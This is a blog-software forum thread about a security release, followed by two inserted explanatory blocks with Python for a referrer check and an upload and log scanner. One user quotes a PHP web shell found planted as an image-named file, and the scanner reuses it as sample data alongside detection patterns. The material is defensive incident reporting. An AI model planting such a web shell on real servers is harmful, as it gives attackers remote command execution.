Serendipity 1.5.5 released: IMPORTANT Security Fix

garvinhicking
Core Developer
Posts: 30022
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany
Contact:

Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by garvinhicking »

Hi!

Serendipity 1.5.5 has been released to address a serious security issue. Please read http://blog.s9y.org/archives/224-Import ... eased.html

Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
ellisse
Regular
Posts: 5
Joined: Fri Aug 18, 2006 10:08 am
Location: Italy
Contact:

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by ellisse »

Hi... I'm sorry, but I've found a virus named "Obfuscated" in plugins\QuickTag\tag-lib.js (AVG Antivirus). Can I safely upgrade to Serendipity 1.5.5 after the virus elimination?
Thanks
e.
garvinhicking
Core Developer
Posts: 30022
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany
Contact:

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by garvinhicking »

Hi!

tag-lib.js uses javascript encryption to make the size smaller; this is called "compression". Even though some trojans use this technique, it does not inherently mean a security issue. In this case, the tag-lib.js file does not contain any trojan and is meant to be that way.

If you still feel uncomfortable, you can of course delete that file - it is only required for a specific feature of the Xinha WYSIWYG editing component ("QuickTags").

HTH,
Garvin
peacekeeper
Regular
Posts: 13
Joined: Sat Feb 07, 2009 12:54 pm
Location: DE
Contact:

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by peacekeeper »

Hi,
after I updated S9Y to version 1.5.5 I cannot create new entries. I have got the following error alert: "Ihr Browser hat keinen gültigen HTTP-Referrer übermittelt. Dies kann entweder daher kommen, dass Ihr Browser/Proxy nicht korrekt konfiguriert ist, oder dass Sie Opfer einer "Cross Site Request Forgery (XSRF)" waren, mit der man Sie zu ungewollten Änderungen zwingen wollte. Die angeforderte Aktion konnte daher nicht durchgeführt werden."

I updated 3 of my blogs. It's the same problem on each blog. I tested it on Internet Explorer 8, Firefox and Chrome! Same problem! :-(
garvinhicking
Core Developer
Posts: 30022
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany
Contact:

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by garvinhicking »

Hi!

From which version did you upgrade? Did you change anything in your PHP installation and/or .htaccess?

The error usually only happens if the PHP sessions mismatch, or your browser does not submit an "HTTP Referer" string. Also make sure you use the blog domain name to login that is configured inside s9y as the HTTP host.

HTH,
Garvin
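The reply above describes the two conditions under which the XSRF guard rejects a request: the browser (or a proxy in front of it) sends no Referer at all, or the Referer host differs from the host configured as the blog's HTTP host. The following Python is an added illustration of that kind of check and is not Serendipity's own code; the configured host name and the three sample request headers are constructed for this example.

```python
from typing import Dict, Tuple
from urllib.parse import urlsplit

# Assumed value: the host name the blog was configured with (s9y's "HTTP host").
CONFIGURED_HOST = "blog.example.org"


def referer_check(headers: Dict[str, str],
                  configured_host: str = CONFIGURED_HOST) -> Tuple[bool, str]:
    """Referer-based XSRF guard.

    Returns (accepted, reason). The request is rejected when the Referer is
    missing, is not an absolute http(s) URL, or names a different host than
    the one the blog is configured for.
    """
    referer = headers.get("Referer")
    if not referer:
        # Typical cause: browser privacy setting or proxy stripping the header.
        return False, "no Referer header was submitted"

    parts = urlsplit(referer)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False, "Referer is not an absolute http(s) URL"

    # Host comparison is case-insensitive; "www." is NOT treated as equivalent,
    # which is exactly why logging in under a different alias of the blog
    # domain trips the check.
    if parts.hostname.lower() != configured_host.lower():
        return False, (f"Referer host {parts.hostname!r} does not match "
                       f"configured host {configured_host!r}")

    return True, "Referer host matches the configured host"


# Constructed sample requests covering the cases discussed in the thread.
SAMPLE_REQUESTS = {
    "normal": {"Referer": "http://blog.example.org/serendipity_admin.php"},
    "referer_stripped": {},
    "logged_in_via_alias": {"Referer": "http://www.blog.example.org/serendipity_admin.php"},
}


def evaluate_samples() -> Dict[str, Tuple[bool, str]]:
    """Run the guard over every constructed sample request."""
    return {name: referer_check(hdrs) for name, hdrs in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    for name, (ok, reason) in evaluate_samples().items():
        print(f"{name:20s} {'ACCEPT' if ok else 'REJECT':6s} {reason}")
```

The `logged_in_via_alias` case is the one the reply points at: the session is valid, but the admin was opened under `www.blog.example.org` while the blog is configured as `blog.example.org`, so every form submission is refused. A Referer check is only a coarse guard, since the header is optional and privacy tools routinely drop it; a per-session anti-CSRF token in each form does not depend on the browser sending it.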
bryzo
Posts: 0
Joined: Sun Jan 02, 2011 10:22 pm

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by bryzo »

I downloaded 1.5.5 LITE yesterday. Is that download already patched? Or do I need to patch it?
Don Chambers
Regular
Posts: 3652
Joined: Mon Feb 13, 2006 2:40 am
Location: Chicago, IL, USA
Contact:

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by Don Chambers »

The lite version should also be the upgraded version.
=Don=
Maccsta
Regular
Posts: 77
Joined: Mon Feb 19, 2007 6:07 am
Location: Leeds, England

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by Maccsta »

I haven't updated some of my blogs for years! Better do this one then!
david@mediacopy
Regular
Posts: 56
Joined: Sun May 18, 2008 5:50 pm

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by david@mediacopy »

I've just installed the new version. While checking I found a file called

1.php.png

containing the line <?PHP system($_GET['cmd']); ?>

Looking at the logfile for the site, it had been accessed and they were looking for 1.php.jpg and 2.php.jpg.
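The post above gives two artifacts a defender can check for after an upgrade: a file with an image extension that actually contains a PHP open tag, and access-log requests for such double-extension names. The Python below is an added example of both checks and is not code from the thread or the project; the log lines, file names and file contents are constructed for the example (the web shell body is the one-liner quoted in the post).

```python
import re
from typing import Dict, List, Optional

# Constructed access-log excerpt in common log format (not the poster's log).
SAMPLE_LOG = """\
203.0.113.5 - - [03/Jan/2011:10:12:01 +0000] "GET /uploads/1.php.jpg?cmd=id HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Jan/2011:10:12:02 +0000] "GET /uploads/2.php.jpg?cmd=id HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Jan/2011:10:13:40 +0000] "GET /uploads/photo.jpg HTTP/1.1" 200 5123 "http://blog.example.org/" "Mozilla/5.0"
203.0.113.5 - - [03/Jan/2011:10:15:09 +0000] "GET /uploads/1.php.png?cmd=uname%20-a HTTP/1.1" 200 88 "-" "curl/7.21"
"""

# Constructed files: the web shell quoted in the post, plus a real PNG header.
SAMPLE_FILES = {
    "1.php.png": b"<?PHP system($_GET['cmd']); ?>",
    "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "notes.php": b"<?php echo 'hello'; ?>",
}

DOUBLE_EXT = re.compile(r"\.php\d?\.(?:jpe?g|png|gif)$", re.IGNORECASE)
IMAGE_EXT = re.compile(r"\.(?:jpe?g|png|gif)$", re.IGNORECASE)
PHP_OPEN_TAG = re.compile(rb"<\?(?:php|=)", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def classify_upload(name: str, content: bytes) -> Optional[str]:
    """Return a reason string if the file looks like a disguised PHP file, else None."""
    if DOUBLE_EXT.search(name):
        # Apache's multi-extension handling can hand such a name to the PHP
        # handler, so the name alone is worth an alert regardless of content.
        return "double extension: PHP name hidden behind an image extension"
    if IMAGE_EXT.search(name) and PHP_OPEN_TAG.search(content):
        return "image-named file contains a PHP open tag"
    return None


def scan_uploads(files: Dict[str, bytes]) -> Dict[str, str]:
    """Map every suspicious file name to the reason it was flagged."""
    flagged = {}
    for name, content in files.items():
        reason = classify_upload(name, content)
        if reason:
            flagged[name] = reason
    return flagged


def scan_log(log_text: str) -> List[dict]:
    """Find requests for double-extension names; status 200 means one was served."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        path = m.group(1).split("?", 1)[0]   # drop the query string (?cmd=...)
        if DOUBLE_EXT.search(path):
            hits.append({"ip": line.split(" ", 1)[0],
                         "path": path,
                         "status": int(m.group(2))})
    return hits


if __name__ == "__main__":
    for name, reason in scan_uploads(SAMPLE_FILES).items():
        print(f"FILE  {name}: {reason}")
    for hit in scan_log(SAMPLE_LOG):
        marker = "SERVED" if hit["status"] == 200 else "probe "
        print(f"LOG   {marker} {hit['ip']} {hit['path']} -> {hit['status']}")
```

Run against a real upload directory and access log, the 404 entries show where the probing started, and any 200 for the same kind of name points at a file that must be treated as an established foothold rather than a failed attempt, which changes the response from "delete the file" to "rebuild from known-good and rotate credentials".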
VideoRob
Regular
Posts: 21
Joined: Fri Feb 01, 2008 6:11 am

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by VideoRob »

Looks like I should update. I have over 50 blogs that I haven't updated in years.